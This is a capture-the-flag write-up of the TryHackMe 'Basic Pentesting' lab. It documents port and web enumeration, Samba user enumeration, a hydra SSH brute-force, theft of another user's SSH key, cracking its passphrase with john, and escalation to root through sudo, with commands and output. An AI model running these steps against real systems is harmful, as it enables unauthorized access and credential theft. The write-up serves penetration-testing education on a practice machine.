THM Basic Pentesting WriteUp
Basic Pentesting Skills
Basic Pentesting is an easy Linux machine where we will use the following skills:
- Port Discovery
- Web Fuzzing
- Samba User Enumeration
- SSH Password Brute-Force
- Cracking SSH Key
- Sudoers Abusing
IP Address Enumeration
Using the usual nmap scan I’ve discovered port 22, 80, 139, 445, 8009 & port 8080:
1
2
3
4
5
6
7
8
9
10
11
12
13
❯ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.220.168 -oG allPorts
Nmap scan report for 10.10.220.168
Host is up, received user-set (0.10s latency).
Scanned at 2024-12-12 01:50:27 CET for 17s
Not shown: 64883 closed tcp ports (reset), 646 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
8009/tcp open ajp13 syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
Then i launched a basic group of scripts to seek more info from the open ports:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
❯ nmap -sCV -p22,80,139,445,8009,8080 10.10.220.168 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 01:52 CET
Nmap scan report for 10.10.220.168
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-12T00:52:16
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-12-11T19:52:16-05:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
So we have to check the following ports & services:
- Port 22 –> SSH 7.2p2
- Port 80 –> Apache 2.4.18
- Port 445 –> Samba 4.3.11
- Port 8009 –> Apache Jserv
- Port 8080 –> Apache Tomcat 9.0.7
Let’s start with the Apache service.
Port 80 Enumeration
At first i run whatweb, to seek for some versions and technologies used in the website:
1
2
❯ whatweb 10.10.220.168
http://10.10.220.168 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.220.168]
Nothing fancy, so i will take a look inside the website, once inside http://10.10.220.168, we are in front of a page under maintenance:
Nothing in the source-code, so i ran a Fuzzing Attack:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.220.168 -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.220.168
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/development (Status: 301) [Size: 320] [--> http://10.10.220.168/development/]
/server-status (Status: 403) [Size: 301]
Progress: 20478 / 20479 (100.00%)
===============================================================
Finished
===============================================================
I found a directory named development, there are 2 text files inside, named dev.txt & j.txt:
dev.txt:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
j.txt:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Seems like someone named “J” have a weak password, we will save this info in case we found a user named J or something similar.
Port 8080 Enumeration
After not finding anything more in the port 80, i checked the Apache Tomcat service, but nothing there, just a default Tomcat page.
Port 445 Enumeration
I headed to scan the Samba service, i started with a nmap scan using most of the SAMBA scripts Nmap give us:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ nmap -p139,445 --script="smb-vuln*,smb-enum*" 10.10.220.168 -oN smbScan
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
It’s vulnerable to an exploit but it is a DoS vuln, so let’s keep scaning.
I ran enum4linux seeking for users and more valuable info and after a while we found two users:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
==================( Users on 10.10.220.168 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
We found the next users:
- User 0 —> kay
- User 1 —> jan
I figured that the J guy from the j.txt file is Jan, so knowing his password is weak i will try brute-forcing the Apache Tomcat service, but after trying some wordlists it didn’t work, so i tried to brute-force the SSH service.
Port 22
I started the brute-force with hydra and let it complete:
1
hydra -l jen -P /usr/share/seclists/Passwords/probable-v2-top12000.txt ssh://10.10.220.168 -t 4
After a while we found the next credentials:
1
[22][ssh] host: 10.10.220.168 login: jan password: armando
Shell as Jan
So, once we got valid credentials i logged in with them via SSH:
1
2
3
❯ ssh jan@10.10.220.168
jan@basic2:~$
I tried the usual privEsc techniques (id, sudo -l, SUID, etc) but i don’t found anything so i checked inside the kay home directory and found that his id_rsa is readable so i transferred it to my machine and tried to login:
1
2
3
❯ chmod 600 id_rsa
❯ ssh -i id_rsa jay@10.10.220.168
Enter passphrase for key 'id_rsa':
But it was protected by a passphrase, so we have to crack the id_rsa, we have to convert the id_rsa to a john format, we can do that with ssh2john:
1
ssh2john id_rsa > hash
After converting it, we can crack it using john :
1
2
3
4
5
6
7
8
9
10
11
❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
1g 0:00:00:00 DONE (2024-12-12 03:05) 3.030g/s 250763p/s 250763c/s 250763C/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We found a valid passphrase, beeswax, so let’s log in as Kay:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ ssh -i id_rsa kay@10.10.220.168
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
Shell as Kay
This is now so easy, there is a password backup in Kay’s home directory, after opening the file we get Kay password:
1
2
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
After getting it we run sudo -l to see if we have any sudoers privilege and we can now use any binary as root:
1
2
3
4
5
6
kay@basic2:~$ sudo -l
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
So just use su to log in as root and provide Kay’s password:
1
2
kay@basic2:~$ sudo su
root@basic2:/home/kay#
You have a cool flag in the root home directory:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@basic2:/home/kay# cd
root@basic2:~# ls
flag.txt
root@basic2:~# cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.
Happy hacking!
root@basic2:~#
Thanks for reading, i’ll appreciate that you take a look to my other posts :)